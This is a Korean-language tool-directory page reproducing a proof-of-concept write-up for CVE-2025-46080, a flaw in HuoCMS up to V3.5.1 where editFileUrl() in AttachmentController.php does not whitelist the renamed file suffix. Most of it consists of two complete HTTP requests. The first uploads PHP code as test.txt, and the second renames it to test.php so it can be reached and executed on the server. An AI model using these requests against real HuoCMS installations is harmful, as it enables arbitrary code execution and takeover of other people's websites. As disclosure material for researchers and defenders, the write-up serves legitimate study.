Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-46080 — 세부 정보 | Kitploit
도구/GitHubGitHub/yggcwhat/cve-2025-46080
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationWeb SecurityMisconfiguration
GitHubyggcwhat/cve-2025-46080

CVE-2025-46080

세부 정보

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

버그 작성자:

yggcwhat

영향받는 버전:

Huocms

공급업체:

https://huocms.com/

소스 코드 주소:

https://gitee.com/digital-flag/huocms

취약점 파일:

AttachmentController.php

영향받는 버전:

HuoCMS - <=V3.5.1

설명:

app ->controller ->backend -> AttachmentController.php:editFileUrl()

editFileUrl 메서드에서 호출되는 copy 함수의 $newPathUrl 접미사는 화이트리스트로 검증되지 않아 파일 이름을 수정하는 데 악용될 수 있습니다. 접미사는 전달된 suffix_url에 의해 제어되며 조작 가능합니다.

image

도구 다운로드

1단계: 사전에 화이트리스트에 등록된 접미사를 가진 악성 콘텐츠가 포함된 파일을 업로드하고 동시에 파일 ID를 기록합니다.

root@kitploit:~
POST /attachment/uploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization:  token
Content-Type: multipart/form-data; boundary=----geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Length: 581
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php/Index/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="type"

2
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="attachment_cate_id"

0
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="reduce_img"


------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

<?php
echo "hello word!"
?>
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9--

image

내용에 기반하여 ID는 67로 확인됩니다.

2단계: 그런 다음 editFileUrl을 기반으로 요청을 구성하여 id 67인 파일의 이름을 변경합니다. 이때 취약점의 editFileUrl 내부의 copy 함수가 호출되어 불법적인 접미사로 파일 이름을 변경합니다.

root@kitploit:~
POST /attachment/editFileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: token
Content-Length: 83
Origin: http://127.0.0.1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

id=67&name=test&prefix_url=&suffix_url=file/20250416/test.php&description=123123123

image

참고: 다시 수정하려면 suffix_url의 파일 이름을 변경하여 editFileUrl 내부에서 $oldPathUrl != $newPathUrl에 의해 트리거되는 copy 함수를 우회해야 합니다.

접근 URL: http://127.0.0.1/storage/file/20250416/test.php

image

참조:

http://huocms.com https://github.com/yggcwhat/CVE-2025-46080/edit/main/README.md https://www.huocms.com/